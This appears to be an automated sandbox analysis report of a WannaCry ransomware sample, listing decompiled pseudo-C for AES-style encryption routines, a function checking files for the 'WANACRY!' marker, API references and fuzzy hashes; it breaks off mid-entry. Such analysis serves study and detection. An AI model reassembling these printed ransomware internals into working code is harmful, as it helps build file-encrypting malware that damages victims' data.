0x00402df9
0x00000000
0x00000000
0x00000000
0x00402df9
0x00000000
0x00402db5
0x00402d16
0x00000000
0x00000000
0x00402d1c
0x00402d22
0x00402d25
0x00402d28
0x00402d2a
0x00402d2d
0x00402d2d
0x00000000
0x00402dfb
0x00402dfb
0x00000000
0x00402cb5
0x00402c56
0x00402c5c
0x00402c6a
0x00402c6e
0x00402c74
0x00402c75
0x00402c7e
0x00402c8b
0x00402c91
0x00402c93
0x00402c96
0x00402c9d
0x00402ca3
0x00000000
0x00000000
0x00000000
0x00402ca3
0x00000000
0x00402c5c
0x00402c24
0x00402c27
0x00402c2d
0x00402c2e
0x00402c36
0x00402c3f
0x00402c43
0x00402c45
0x00402c46
0x00402c49
0x00402c49
0x00402c49
0x00000000
0x00402c27
0x00402bd9
0x00402bdf
0x00402bdf
0x00402be4
0x00402bea
0x00402bea
0x00402bea
0x00402bec
0x00402bed
0x00402bf0
0x00000000
0x00402bdf
0x00402bb3
0x00402bb6
0x00402bb6
0x00402bbb
0x00402bc1
0x00402bc1
0x00402bc1
0x00402bc3
0x00402bc4
0x00402bc7
0x00000000
0x00402bb6
0x00402b55
0x00000000
0x00402b55

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402A95
_CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402AA4
??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402ACD
_CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402ADC
??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402AFF
_CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402B0E
memcpy.MSVCRT(?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B2A
memcpy.MSVCRT(?,?,?,?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B3F

Strings

, xrefs: 00402E64

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrow$memcpy
String ID:
API String ID: 1881450474-3916222277
Opcode ID: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
Instruction ID: fcfef073648f46ce18afaeffe4143d5033c2e410e09e17396796de68d512254b
Opcode Fuzzy Hash: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
Instruction Fuzzy Hash: 8DD1C3706006099FDB28CF29C5846EA77F5FF48314F14C43EE95AEB281D778AA85CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004014A6 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 178filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040150D
GetFileSizeEx.KERNEL32(00000000,?), ref: 00401529
memcmp.MSVCRT(?,WANACRY!,00000008), ref: 00401572
GlobalAlloc.KERNEL32(00000000,?,?,?,00000010,?,?,?,?), ref: 0040166D
_local_unwind2.MSVCRT(?,000000FF), ref: 004016D6

Strings

WANACRY!, xrefs: 00401566

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: File$AllocCreateGlobalSize_local_unwind2memcmp
String ID: WANACRY!
API String ID: 283026544-1240840912
Opcode ID: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
Instruction ID: 23909f9b909e50c20e483d6bc4be6e23e355ec3bf8b0a6de4718622c8bde6caa
Opcode Fuzzy Hash: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
Instruction Fuzzy Hash: 6E512C71900209ABDB219F95CD84FEEB7BCEB08790F1444BAF515F21A0D739AA45CB28

Uniqueness

Uniqueness Score: -1.00%

Function 0040350F Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 214
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E0040350F(void* __ecx, signed int _a4, signed char* _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v56;
				signed int _t150;
				signed int _t151;
				signed int _t155;
				signed int* _t157;
				signed char _t158;
				intOrPtr _t219;
				signed int _t230;
				signed char* _t236;
				signed char* _t237;
				signed char* _t238;
				signed char* _t239;
				signed int* _t240;
				signed char* _t242;
				signed char* _t243;
				signed char* _t245;
				signed int _t260;
				signed int* _t273;
				signed int _t274;
				void* _t275;
				void* _t276;

				_t275 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v56);
					L0040776E();
				}
				_t150 =  *(_t275 + 0x3cc);
				if(_t150 == 0x10) {
					return E00402E7E(_t275, _a4, _a8);
				}
				asm("cdq");
				_t230 = 4;
				_t151 = _t150 / _t230;
				_t274 = _t151;
				asm("sbb eax, eax");
				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
				_v28 =  *((intOrPtr*)(_t155 + 0x40bc24));
				_v24 =  *((intOrPtr*)(_t155 + 0x40bc2c));
				_v32 =  *((intOrPtr*)(_t155 + 0x40bc34));
				_t157 = _t275 + 0x454;
				if(_t274 > 0) {
					_v16 = _t274;
					_v8 = _t275 + 8;
					_t242 = _a4;
					do {
						_t243 =  &(_t242[1]);
						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
						_t245 =  &(_t243[2]);
						_t273 = _t157;
						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
						_v8 = _v8 + 4;
						_t242 =  &(_t245[1]);
						_t157 =  &(_t157[1]);
						 *_t273 =  *_t273 ^  *_v8;
						_t27 =  &_v16;
						 *_t27 = _v16 - 1;
					} while ( *_t27 != 0);
				}
				_t158 = 1;
				_v16 = _t158;
				if( *(_t275 + 0x410) > _t158) {
					_v12 = _t275 + 0x28;
					do {
						if(_t274 > 0) {
							_t34 =  &_v28; // 0x403b51
							_t260 =  *_t34;
							_v8 = _v12;
							_a4 = _t260;
							_v36 = _v24 - _t260;
							_t240 = _t275 + 0x434;
							_v40 = _v32 - _t260;
							_v20 = _t274;
							do {
								asm("cdq");
								_v44 = 0;
								asm("cdq");
								asm("cdq");
								_v8 = _v8 + 4;
								 *_t240 =  *(0x4093fc + _v44 * 4) ^  *(0x4097fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00408FFC ^  *0x00408BFC ^  *_v8;
								_t240 =  &(_t240[1]);
								_a4 = _a4 + 1;
								_t84 =  &_v20;
								 *_t84 = _v20 - 1;
							} while ( *_t84 != 0);
						}
						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
						_v12 = _v12 + 0x20;
						_t276 = _t276 + 0xc;
						_v16 = _v16 + 1;
						_t158 = _v16;
					} while (_t158 <  *(_t275 + 0x410));
				}
				_v8 = _v8 & 0x00000000;
				if(_t274 > 0) {
					_t236 = _a8;
					_t219 = _v24;
					_a8 = _t275 + 0x454;
					_t100 =  &_v28; // 0x403b51
					_v44 =  *_t100 - _t219;
					_v40 = _v32 - _t219;
					do {
						_a8 =  &(_a8[4]);
						_a4 =  *((intOrPtr*)(_t275 + 8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
						 *_t236 =  *0x004089FC ^ _a4 >> 0x00000018;
						_t237 =  &(_t236[1]);
						asm("cdq");
						 *_t237 =  *0x004089FC ^ _a4 >> 0x00000010;
						asm("cdq");
						_t238 =  &(_t237[1]);
						 *_t238 =  *0x004089FC ^ _a4 >> 0x00000008;
						_t239 =  &(_t238[1]);
						asm("cdq");
						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x4089fc) ^ _a4;
						 *_t239 = _t158;
						_t236 =  &(_t239[1]);
						_v8 = _v8 + 1;
						_t219 = _t219 + 1;
					} while (_v8 < _t274);
				}
				return _t158;
			}

0x00403517
0x0040351e
0x00403528
0x00403531
0x00403536
0x00403537
0x00403537
0x0040353c
0x00403545
0x00000000
0x0040354f
0x0040355b
0x0040355c
0x0040355d
0x0040355f
0x0040356e
0x00403572
0x0040357d
0x0040358c
0x0040358f
0x00403592
0x00403598
0x0040359d
0x004035a0
0x004035a3
0x004035a6
0x004035ac
0x004035ad
0x004035b5
0x004035be
0x004035bf
0x004035c4
0x004035c9
0x004035cd
0x004035d0
0x004035d3
0x004035d5
0x004035d5
0x004035d5
0x004035a6
0x004035dc
0x004035e3
0x004035e6
0x004035ef
0x004035f2
0x004035f4
0x004035fd
0x004035fd
0x00403600
0x00403608
0x0040360b
0x00403613
0x00403619
0x0040361c
0x0040361f
0x00403627
0x0040363a
0x0040363d
0x00403660
0x00403682
0x00403688
0x0040368a
0x0040368d
0x00403690
0x00403690
0x00403690
0x0040361f
0x004036a9
0x004036ae
0x004036b2
0x004036b5
0x004036b8
0x004036bb
0x004035f2
0x004036c7
0x004036cd
0x004036d3
0x004036d6
0x004036df
0x004036e2
0x004036e7
0x004036ef
0x004036f2
0x00403701
0x00403709
0x0040371f
0x00403726
0x00403727
0x00403741
0x00403745
0x0040374a
0x00403760
0x00403767
0x00403768
0x0040377d
0x00403780
0x00403782
0x00403783
0x00403786
0x00403787
0x004036f2
0x00403794

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403528
_CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403537
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B51,?,?), ref: 004036A9

Strings

Q;@, xrefs: 004036E2, 004035FD
, xrefs: 004036AE

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrowmemcpy
String ID: $Q;@
API String ID: 2382887404-262343263
Opcode ID: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
Instruction ID: bc36c6e363c45e845c5013d3ee32ff29fee655b638a1b5d52e43d816bbd12583
Opcode Fuzzy Hash: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
Instruction Fuzzy Hash: A581C3759002499FCB05CF68C9809EEBBF5EF89308F2484AEE595E7352C234BA45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403797 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214
COMMONCrypto

Download Yara Rule

C-Code - Quality: 54%

			E00403797(void* __ecx, signed int _a4, signed char* _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v56;
				signed int _t150;
				signed int _t151;
				signed int _t155;
				signed int* _t157;
				signed char _t158;
				intOrPtr _t219;
				signed int _t230;
				signed char* _t236;
				signed char* _t237;
				signed char* _t238;
				signed char* _t239;
				signed int* _t240;
				signed char* _t242;
				signed char* _t243;
				signed char* _t245;
				signed int _t260;
				signed int* _t273;
				signed int _t274;
				void* _t275;
				void* _t276;

				_t275 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v56);
					L0040776E();
				}
				_t150 =  *(_t275 + 0x3cc);
				if(_t150 == 0x10) {
					return E004031BC(_t275, _a4, _a8);
				}
				asm("cdq");
				_t230 = 4;
				_t151 = _t150 / _t230;
				_t274 = _t151;
				asm("sbb eax, eax");
				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
				_v28 =  *((intOrPtr*)(_t155 + 0x40bc28));
				_v24 =  *((intOrPtr*)(_t155 + 0x40bc30));
				_v32 =  *((intOrPtr*)(_t155 + 0x40bc38));
				_t157 = _t275 + 0x454;
				if(_t274 > 0) {
					_v16 = _t274;
					_v8 = _t275 + 0x1e8;
					_t242 = _a4;
					do {
						_t243 =  &(_t242[1]);
						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
						_t245 =  &(_t243[2]);
						_t273 = _t157;
						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
						_v8 = _v8 + 4;
						_t242 =  &(_t245[1]);
						_t157 =  &(_t157[1]);
						 *_t273 =  *_t273 ^  *_v8;
						_t27 =  &_v16;
						 *_t27 = _v16 - 1;
					} while ( *_t27 != 0);
				}
				_t158 = 1;
				_v16 = _t158;
				if( *(_t275 + 0x410) > _t158) {
					_v12 = _t275 + 0x208;
					do {
						if(_t274 > 0) {
							_t260 = _v28;
							_v8 = _v12;
							_a4 = _t260;
							_v36 = _v24 - _t260;
							_t240 = _t275 + 0x434;
							_v40 = _v32 - _t260;
							_v20 = _t274;
							do {
								asm("cdq");
								_v44 = 0;
								asm("cdq");
								asm("cdq");
								_v8 = _v8 + 4;
								 *_t240 =  *(0x40a3fc + _v44 * 4) ^  *(0x40a7fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00409FFC ^  *0x00409BFC ^  *_v8;
								_t240 =  &(_t240[1]);
								_a4 = _a4 + 1;
								_t84 =  &_v20;
								 *_t84 = _v20 - 1;
							} while ( *_t84 != 0);
						}
						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
						_v12 = _v12 + 0x20;
						_t276 = _t276 + 0xc;
						_v16 = _v16 + 1;
						_t158 = _v16;
					} while (_t158 <  *(_t275 + 0x410));
				}
				_v8 = _v8 & 0x00000000;
				if(_t274 > 0) {
					_t236 = _a8;
					_t219 = _v24;
					_a8 = _t275 + 0x454;
					_v44 = _v28 - _t219;
					_v40 = _v32 - _t219;
					do {
						_a8 =  &(_a8[4]);
						_a4 =  *((intOrPtr*)(_t275 + 0x1e8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
						 *_t236 =  *0x00408AFC ^ _a4 >> 0x00000018;
						_t237 =  &(_t236[1]);
						asm("cdq");
						 *_t237 =  *0x00408AFC ^ _a4 >> 0x00000010;
						asm("cdq");
						_t238 =  &(_t237[1]);
						 *_t238 =  *0x00408AFC ^ _a4 >> 0x00000008;
						_t239 =  &(_t238[1]);
						asm("cdq");
						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x408afc) ^ _a4;
						 *_t239 = _t158;
						_t236 =  &(_t239[1]);
						_v8 = _v8 + 1;
						_t219 = _t219 + 1;
					} while (_v8 < _t274);
				}
				return _t158;
			}

0x0040379f
0x004037a6
0x004037b0
0x004037b9
0x004037be
0x004037bf
0x004037bf
0x004037c4
0x004037cd
0x00000000
0x004037d7
0x004037e3
0x004037e4
0x004037e5
0x004037e7
0x004037f6
0x004037fa
0x00403805
0x00403814
0x00403817
0x0040381a
0x00403820
0x00403828
0x0040382b
0x0040382e
0x00403831
0x00403837
0x00403838
0x00403840
0x00403849
0x0040384a
0x0040384f
0x00403854
0x00403858
0x0040385b
0x0040385e
0x00403860
0x00403860
0x00403860
0x00403831
0x00403867
0x0040386e
0x00403871
0x0040387d
0x00403880
0x00403882
0x0040388b
0x0040388e
0x00403896
0x00403899
0x004038a1
0x004038a7
0x004038aa
0x004038ad
0x004038b5
0x004038c8
0x004038cb
0x004038ee
0x00403910
0x00403916
0x00403918
0x0040391b
0x0040391e
0x0040391e
0x0040391e
0x004038ad
0x00403937
0x0040393c
0x00403940
0x00403943
0x00403946
0x00403949
0x00403880
0x00403955
0x0040395b
0x00403961
0x00403964
0x0040396d
0x00403975
0x0040397d
0x00403980
0x0040398f
0x0040399a
0x004039b0
0x004039b7
0x004039b8
0x004039d2
0x004039d6
0x004039db
0x004039f1
0x004039f8
0x004039f9
0x00403a0e
0x00403a11
0x00403a13
0x00403a14
0x00403a17
0x00403a18
0x00403980
0x00403a25

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037B0
_CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037BF
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?), ref: 00403937

Strings

, xrefs: 0040393C

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrowmemcpy
String ID:
API String ID: 2382887404-3916222277
Opcode ID: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
Instruction ID: 1cfba4d829132d5223a2741c68a06c6b284a50eb41fad236877f379c856cacdf
Opcode Fuzzy Hash: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
Instruction Fuzzy Hash: B991C375A002499FCB05CF69C480AEEBBF5FF89315F2480AEE595E7342C234AA45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004029CC Relevance: 3.8, APIs: 3, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004029CC(void* _a4) {
				void* _t17;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t25;
				signed int _t35;
				void* _t37;

				_t37 = _a4;
				if(_t37 != 0) {
					if( *((intOrPtr*)(_t37 + 0x10)) != 0) {
						_t25 =  *((intOrPtr*)(_t37 + 4));
						 *((intOrPtr*)( *((intOrPtr*)( *_t37 + 0x28)) + _t25))(_t25, 0, 0);
					}
					if( *(_t37 + 8) == 0) {
						L9:
						_t18 =  *((intOrPtr*)(_t37 + 4));
						if(_t18 != 0) {
							 *((intOrPtr*)(_t37 + 0x20))(_t18, 0, 0x8000,  *((intOrPtr*)(_t37 + 0x30)));
						}
						return HeapFree(GetProcessHeap(), 0, _t37);
					} else {
						_t35 = 0;
						if( *((intOrPtr*)(_t37 + 0xc)) <= 0) {
							L8:
							free( *(_t37 + 8));
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t23 =  *((intOrPtr*)( *(_t37 + 8) + _t35 * 4));
							if(_t23 != 0) {
								 *((intOrPtr*)(_t37 + 0x2c))(_t23,  *((intOrPtr*)(_t37 + 0x30)));
							}
							_t35 = _t35 + 1;
						} while (_t35 <  *((intOrPtr*)(_t37 + 0xc)));
						goto L8;
					}
				}
				return _t17;
			}

0x004029ce
0x004029d6
0x004029db
0x004029df
0x004029ea
0x004029ea
0x004029ef
0x00402a1d
0x00402a1d
0x00402a22
0x00402a2e
0x00402a31
0x00000000
0x004029f1
0x004029f2
0x004029f7
0x00402a12
0x00402a15
0x00000000
0x00000000
0x00000000
0x00000000
0x004029f9
0x004029f9
0x004029fc
0x00402a01
0x00402a07
0x00402a0b
0x00402a0c
0x00402a0d
0x00000000
0x004029f9
0x004029ef
0x00402a45

APIs

free.MSVCRT(?,00402198,00000000,00000000,0040243C,00000000), ref: 00402A15
GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,0040243C,00000000), ref: 00402A36
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 00402A3D

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: Heap$FreeProcessfree
String ID:
API String ID: 3428986607-0
Opcode ID: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
Instruction ID: 6307eaad725422957632c7c85bafc458d1caddc7471a2505469f2591130cc2ff
Opcode Fuzzy Hash: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
Instruction Fuzzy Hash: C4010C72600A019FCB309FA5DE88967B7E9FF48321354483EF196A2591CB75F841CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00402E7E Relevance: 3.3, APIs: 2, Instructions: 272
COMMONCrypto

Download Yara Rule

C-Code - Quality: 34%

			E00402E7E(intOrPtr __ecx, signed int* _a4, signed char* _a8) {
				signed int _v8;
				void* _v9;
				void* _v10;
				void* _v11;
				signed int _v12;
				void* _v13;
				void* _v14;
				void* _v15;
				signed int _v16;
				void* _v17;
				void* _v18;
				void* _v19;
				signed int _v20;
				void* _v21;
				void* _v22;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				char _v44;
				signed char* _t151;
				signed char* _t154;
				signed char* _t155;
				signed char* _t158;
				signed char* _t159;
				signed char* _t160;
				signed char* _t162;
				signed int _t166;
				signed int _t167;
				signed char* _t172;
				signed int* _t245;
				signed int _t262;
				signed int _t263;
				signed int _t278;
				signed int _t279;
				signed int _t289;
				signed int _t303;
				intOrPtr _t344;
				void* _t345;
				signed int _t346;

				_t344 = __ecx;
				_v32 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v44);
					L0040776E();
				}
				_t151 = _a4;
				_t154 =  &(_t151[3]);
				_t155 =  &(_t154[1]);
				_t278 = (( *_t151 & 0x000000ff) << 0x00000018 | (_t151[1] & 0x000000ff) << 0x00000010 |  *_t154 & 0x000000ff) ^  *(_t344 + 8);
				_v20 = _t278;
				_t158 =  &(_t155[3]);
				_t159 =  &(_t158[1]);
				_t160 =  &(_t159[1]);
				_v16 = ((_t154[1] & 0x000000ff) << 0x00000018 | (_t155[1] & 0x000000ff) << 0x00000010 |  *_t158 & 0x000000ff) ^  *(_t344 + 0xc);
				_t162 =  &(_t160[2]);
				_t163 =  &(_t162[1]);
				_t262 = (( *_t159 & 0x000000ff) << 0x00000018 | ( *_t160 & 0x000000ff) << 0x00000010 |  *_t162 & 0x000000ff) ^  *(_t344 + 0x10);
				_v24 = _t262;
				_t166 =  *(_t344 + 0x410);
				_v28 = _t166;
				_v12 = ((_t162[1] & 0x000000ff) << 0x00000018 | (_t163[1] & 0x000000ff) << 0x00000010) ^  *(_t344 + 0x14);
				if(_t166 > 1) {
					_a4 = _t344 + 0x30;
					_v8 = _t166 - 1;
					do {
						_t245 =  &(_a4[8]);
						_a4 = _t245;
						_v24 =  *0x00408FFC ^  *0x00408BFC ^  *0x004093FC ^  *(0x4097fc + (_v16 & 0x000000ff) * 4) ^  *_a4;
						_v16 =  *0x004093FC ^  *0x00408FFC ^  *0x00408BFC ^  *(0x4097fc + (_t278 & 0x000000ff) * 4) ^  *(_a4 - 4);
						_v12 =  *0x00408BFC ^  *0x004093FC ^  *0x00408FFC ^  *(0x4097fc + (_t262 & 0x000000ff) * 4) ^  *(_t245 - 0x1c);
						_t262 = _v24;
						_v24 = _t262;
						_t278 =  *0x004093FC ^  *0x00408FFC ^  *0x00408BFC ^  *(0x4097fc + (_v12 & 0x000000ff) * 4) ^  *(_t245 - 0x28);
						_t80 =  &_v8;
						 *_t80 = _v8 - 1;
						_v20 = _t278;
					} while ( *_t80 != 0);
					_t166 = _v28;
					_t344 = _v32;
				}
				_t167 = _t166 << 5;
				_t86 = _t344 + 8; // 0x8bf9f759
				_t279 =  *(_t167 + _t86);
				_t88 = _t344 + 8; // 0x40355c
				_t345 = _t167 + _t88;
				_v8 = _t279;
				_t172 = _a8;
				 *_t172 =  *0x004089FC ^ _t279 >> 0x00000018;
				_t172[1] =  *0x004089FC ^ _t279 >> 0x00000010;
				_t97 = _t262 + 0x4089fc; // 0x6bf27b77
				_t172[2] =  *_t97 ^ _v8 >> 0x00000008;
				_t172[3] =  *((_v12 & 0x000000ff) + 0x4089fc) ^ _v8;
				_t104 = _t345 + 4; // 0x33c12bf8
				_t289 =  *_t104;
				_v8 = _t289;
				_t172[4] =  *0x004089FC ^ _t289 >> 0x00000018;
				_t172[5] =  *0x004089FC ^ _v8 >> 0x00000010;
				_t172[6] =  *0x004089FC ^ _v8 >> 0x00000008;
				_t172[7] =  *((_v20 & 0x000000ff) + 0x4089fc) ^ _v8;
				_t121 = _t345 + 8; // 0x6ff83c9
				_t303 =  *_t121;
				_v8 = _t303;
				_t172[8] =  *0x004089FC ^ _t303 >> 0x00000018;
				_t172[9] =  *0x004089FC ^ _v8 >> 0x00000010;
				_t172[0xa] =  *0x004089FC ^ _v8 >> 0x00000008;
				_t263 = _t262 & 0x000000ff;
				_t172[0xb] =  *((_v16 & 0x000000ff) + 0x4089fc) ^ _v8;
				_t137 = _t345 + 0xc; // 0x41c1950f
				_t346 =  *_t137;
				_v8 = _t346;
				_t172[0xc] =  *0x004089FC ^ _t346 >> 0x00000018;
				_t172[0xd] =  *0x004089FC ^ _t346 >> 0x00000010;
				_t172[0xe] =  *0x004089FC ^ _t346 >> 0x00000008;
				_t148 = _t263 + 0x4089fc; // 0x6bf27b77
				_t172[0xf] =  *_t148 ^ _v8;
				return _t172;
			}

0x00402e85
0x00402e87
0x00402e8e
0x00402e98
0x00402ea1
0x00402ea6
0x00402ea7
0x00402ea7
0x00402eac
0x00402eca
0x00402ed4
0x00402ed5
0x00402ee0
0x00402eef
0x00402ef5
0x00402eff
0x00402f00
0x00402f11
0x00402f17
0x00402f18
0x00402f26
0x00402f36
0x00402f3e
0x00402f4c
0x00402f4f
0x00402f59
0x00402f5c
0x00402f5f
0x00402fbf
0x00402fcc
0x00402fd6
0x00403016
0x00403031
0x0040303b
0x0040303e
0x00403041
0x00403044
0x00403044
0x00403047
0x00403047
0x00403050
0x00403053
0x00403053
0x00403056
0x00403059
0x00403059
0x0040305d
0x0040305d
0x00403068
0x00403078
0x0040307b
0x0040308f
0x0040309a
0x004030a4
0x004030b8
0x004030bb
0x004030bb
0x004030c4
0x004030d1
0x004030e5
0x004030fa
0x0040310e
0x00403111
0x00403111
0x0040311a
0x00403127
0x0040313b
0x0040314e
0x00403154
0x00403162
0x00403165
0x00403165
0x0040316f
0x0040317f
0x00403194
0x004031a8
0x004031ab
0x004031b5
0x004031b9

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00403554,00000002,?,?,?,?), ref: 00402E98
_CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00403554,00000002,?,?,?,?), ref: 00402EA7

Memory Dump Source

Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrow
String ID:
API String ID: 941485209-0
Opcode ID: 0b3a82e1866a10e008d9e23789663a186783f6e7ea65f1ebfadb5e40c8bf56e2
Instruction ID: 7c46eb61736c4a52f21da4615b0110659747632e7974af7727d2e67ead4b8ec0
Opcode Fuzzy Hash: 0b3a82e1866a10e008d9e23789663a186783f6e7ea65f1ebfadb5e40c8bf56e2
